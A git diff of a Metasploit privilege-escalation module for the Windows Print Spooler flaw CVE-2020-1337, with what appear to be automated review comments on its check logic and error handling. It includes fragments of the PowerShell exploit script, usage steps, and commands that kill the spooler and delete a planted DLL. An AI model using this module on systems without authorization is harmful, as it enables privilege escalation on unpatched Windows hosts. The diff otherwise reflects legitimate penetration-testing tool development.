diff --git a/data/exploits/CVE-2020-1337/cve-2020-1337.ps1 b/data/exploits/CVE-2020-1337/cve-2020-1337.ps1
index be68afaab7..ae87d57f54 100644
--- a/data/exploits/CVE-2020-1337/cve-2020-1337.ps1
+++ b/data/exploits/CVE-2020-1337/cve-2020-1337.ps1
@@ -74,31 +74,6 @@ $MethodDefinition = @"
 }
 return bSuccess;
 }
- public static bool SendFileToPrinter(string szPrinterName, string szFileName)
- {
- // Open the file.
- FileStream fs = new FileStream(szFileName, FileMode.Open);
- // Create a BinaryReader on the file.
- BinaryReader br = new BinaryReader(fs);
- // Dim an array of bytes big enough to hold the file's contents.
- Byte[] bytes = new Byte[fs.Length];
- bool bSuccess = false;
- // Your unmanaged pointer.
- IntPtr pUnmanagedBytes = new IntPtr(0);
- int nLength;
- nLength = Convert.ToInt32(fs.Length);
- // Read the contents of the file into the array.
- bytes = br.ReadBytes(nLength);
- // Allocate some unmanaged memory for those bytes.
- pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
- // Copy the managed byte array into the unmanaged array.
- Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
- // Send the unmanaged bytes to the printer.
- bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
- // Free the unmanaged memory that you allocated earlier.
- Marshal.FreeCoTaskMem(pUnmanagedBytes);
- return bSuccess;
- }
 }
 }
 "@;
diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md
index 45ac103498..31dc6efb68 100644
--- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md
+++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md
@@ -20,24 +20,31 @@ but the link will be in place when the print takes place, so the file write will
 pass through and end up in the trusted location. When the printer is created, the target will show a pop-up saying a
-printer weas created.
+printer was created.
 A larger issue here is that the Spooler service does not like to stop. Trying `sc stop` Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts automatically. Using the `pendingFileRenameOperations` registry key also does not appear to work.
+To remove the dll, you can:
+`sc config spooler start= disabled`
+`taskkill /F /IM spoolsv.exe`
+`del ualapi.dll`
+`sc config spooler start= auto`
+`sc start spooler`
 ## Verification Steps
 Start ```msfconsole```
-  get session on a windows target that is not patched (and <= 2003)
+  get session on a windows target that is not patched (and <= windows 10 version 2004)
 ```use windows/local/cve_2020_1337_printerdemon```
 ```set session ```
 ```set payload ```
 ```set lhost ```
 ```set lport ```
 ```run```
+  Reboot twice
 Verify you get a session
diff --git a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
index e8434608e0..5dac554a13 100644
--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::Windows::Powershell
+ prepend Msf::Exploit::Remote::AutoCheck
+
 def initialize(info = {})
 super(
 update_info(
@@ -92,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Local
 # Run Exploit Script
 print_status("Running Exploit on #{sysinfo['Computer']}")
- vprint_status(script)
 begin
 #client.powershell.execute_string(code: script)
 session.powershell.execute_string({code: script})
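Review bot: With `prepend Msf::Exploit::Remote::AutoCheck` the module now relies on `check` returning a CheckCode before it exploits, but the hunk at `@@ -168,20 +169,6 @@` removes `return Exploit::CheckCode::Safe`, so on a host whose OS string or build number does not match, `check` falls through to the value of the `return ... if` modifier, which is nil when its condition is false. AutoCheck presumably compares that value against the CheckCode constants, so a non-vulnerable target is no longer reported as Safe and the automatic check can apparently no longer stop the exploit on it. Keep the fallthrough explicit by restoring `return Exploit::CheckCode::Safe` as the last line of `check`; the removal of `ensure_clean_destination` in that same hunk is fine on its own. The `check` method's definition begins before that hunk.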
@@ -138,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("Rebooting #{sysinfo['Computer']}")
 reboot_command = 'shutdown /r'
 begin
- cmd_exec('cmd.exe', "/c #{reboot_command}")
+ session.sys.power.reboot
 rescue Rex::TimeoutError => e
 elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
 print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
@@ -168,20 +169,6 @@ class MetasploitModule < Msf::Exploit::Local
 build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
 vprint_status("Build Number = #{build_num}")
 return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
- return Exploit::CheckCode::Safe
 end
-
- def ensure_clean_destination(path)
- return unless file?(path)
- print_status("#{path} already exists on the target. Deleting...")
- begin
- file_rm(path)
- print_status("Deleted #{path}")
- rescue Rex::Post::Meterpreter::RequestError => e
- elog(e)
- print_error("Unable to delete #{path}")
- end
- end
 end
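Review bot: Switching the reboot to `session.sys.power.reboot` leaves `reboot_command = 'shutdown /r'` on the line above as an unused local, and the surrounding `rescue Rex::TimeoutError` was written for the `cmd_exec` path; a failed Meterpreter stdapi request is more likely to surface as `Rex::Post::Meterpreter::RequestError` (the class the removed `ensure_clean_destination` rescued), which this block does not catch. Delete the `reboot_command` assignment and widen the rescue, e.g. `rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError => e`, adjusting the `elog`/`print_error` text since it would then no longer describe only a timeout. The enclosing method starts and ends outside the hunk.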